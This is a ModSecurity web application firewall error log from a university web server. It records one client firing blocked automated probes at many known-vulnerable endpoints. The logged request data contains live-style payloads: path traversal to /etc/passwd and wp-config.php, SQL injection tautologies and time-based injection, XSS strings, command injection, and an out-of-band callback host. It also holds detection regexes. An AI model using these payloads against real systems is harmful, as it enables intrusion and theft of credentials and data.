[Tue Aug 29 11:42:42.397720 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdXInkAAAAd"]
[Tue Aug 29 11:42:43.365677 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAeYbxUAAAAB"]
[Tue Aug 29 11:42:46.372062 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdb7l4AAAAb"]
[Tue Aug 29 11:42:46.684073 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcoNkgAAAAF"]
[Tue Aug 29 11:42:47.396948 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd232QAAAAI"]
[Tue Aug 29 11:42:48.388378 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdV7d0AAAAa"]
[Tue Aug 29 11:42:48.399036 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAcoNksAAAAF"]
[Tue Aug 29 11:42:48.428800 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAeYbyQAAAAB"]
[Tue Aug 29 11:42:48.528944 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gqrwrtnoui85f6.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAcoNkwAAAAF"]
[Tue Aug 29 11:42:50.383743 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAd232kAAAAI"]
[Tue Aug 29 11:42:51.372858 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAd4aysAAAAj"]
[Tue Aug 29 11:42:51.377268 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAeZ544AAAAN"]
[Tue Aug 29 11:42:52.368573 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAeDirUAAAAx"]
[Tue Aug 29 11:42:53.376412 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAeZ55MAAAAN"]
[Tue Aug 29 11:42:53.380045 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAdlvdYAAAAl"]
[Tue Aug 29 11:42:54.470722 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAeB1p0AAAAv"]
[Tue Aug 29 11:42:54.532803 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAeX1CcAAAAK"]
[Tue Aug 29 11:42:57.387232 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAeoA-4AAAAT"]
[Tue Aug 29 11:42:59.702378 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAARpg3oAAAAU"]
[Tue Aug 29 11:43:00.397708 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcsLHwAAAAE"]
[Tue Aug 29 11:43:00.428827 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdTBC8AAAAY"]
[Tue Aug 29 11:43:00.443914 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdECckAAAAW"]
[Tue Aug 29 11:43:03.445148 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeYbzYAAAAB"]
[Tue Aug 29 11:43:03.467759 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdECdEAAAAW"]
[Tue Aug 29 11:43:04.370903 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAeoBAsAAAAT"]
[Tue Aug 29 11:43:04.453233 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdTBDoAAAAY"]
[Tue Aug 29 11:43:06.405451 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAActbNUAAAAH"]
[Tue Aug 29 11:43:07.694105 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAActbNoAAAAH"]
[Tue Aug 29 11:43:08.617682 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAActbN8AAAAH"]
[Tue Aug 29 11:43:08.665508 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAewCUoAAAAI"]
[Tue Aug 29 11:43:09.378602 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAQSW4gAAAA0"]
[Tue Aug 29 11:43:10.427788 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAActbOMAAAAH"]
[Tue Aug 29 11:43:11.405316 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAdSZQ0AAAAX"]
[Tue Aug 29 11:43:14.477837 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAcoNooAAAAF"]
[Tue Aug 29 11:43:15.466488 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 